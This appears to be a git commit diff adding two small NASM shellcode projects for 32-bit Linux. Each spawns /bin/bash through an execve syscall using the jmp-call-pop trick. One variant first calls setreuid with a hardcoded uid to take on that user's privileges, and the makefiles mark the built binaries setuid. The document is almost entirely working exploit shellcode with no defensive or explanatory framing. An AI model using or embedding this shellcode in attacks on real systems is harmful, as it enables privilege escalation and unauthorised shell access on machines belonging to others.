new file: exec_cmd/makefile

new file: exec_cmd/shell new file: exec_cmd/shell.asm new file: exec_cmd/shell.o new file: exec_cmd_setuid/makefile new file: exec_cmd_setuid/shell new file: exec_cmd_setuid/shell.asm new file: exec_cmd_setuid/shell.o
2020-11-20 17:57:20 -06:00 · 2020-11-20 17:57:20 -06:00 · 0c7b4ed751
commit 0c7b4ed751
8 changed files with 57 additions and 0 deletions
--- a/exec_cmd/makefile
+++ b/exec_cmd/makefile
@ -0,0 +1,5 @@
+make:
+	nasm shell.asm -felf32 -o shell.o
+	ld -m elf_i386 shell.o -o shell -s
+	chmod u+s shell
+
--- a/exec_cmd/shell
+++ b/exec_cmd/shell
--- a/exec_cmd/shell.asm
+++ b/exec_cmd/shell.asm
@ -0,0 +1,19 @@
+global _start
+_start:
+jmp short data
+
+exploit:
+xor eax, eax
+xor ebx, ebx
+xor ecx, ecx
+pop edx
+mov [edx + 10], eax
+mov al, 11
+mov ebx, edx
+xor edx, edx
+int 0x80
+
+
+data:
+call exploit 
+cmd: db '/bin/bash'
--- a/exec_cmd/shell.o
+++ b/exec_cmd/shell.o
--- a/exec_cmd_setuid/makefile
+++ b/exec_cmd_setuid/makefile
@ -0,0 +1,5 @@
+make:
+	nasm shell.asm -felf32 -o shell.o
+	ld -m elf_i386 shell.o -o shell -s
+	chmod u+s shell
+
--- a/exec_cmd_setuid/shell
+++ b/exec_cmd_setuid/shell
--- a/exec_cmd_setuid/shell.asm
+++ b/exec_cmd_setuid/shell.asm
@ -0,0 +1,28 @@
+global _start
+_start:
+jmp short data
+
+exploit:
+
+xor edx, edx
+
+xor eax, eax ; set reuid
+xor ebx, ebx
+xor ecx, ecx
+mov al, 203
+mov bx, 14005 
+mov cx, 14005
+int 0x80
+
+xor eax, eax
+xor ebx, ebx
+xor ecx, ecx
+pop edx
+mov [edx + 10], eax
+mov al, 11
+mov ebx, cmd
+int 0x80
+
+data:
+call exploit ; this puts the address of where we're at (where the string is!) in the stack and jmps to start 
+cmd: db '/bin/bash'
--- a/exec_cmd_setuid/shell.o
+++ b/exec_cmd_setuid/shell.o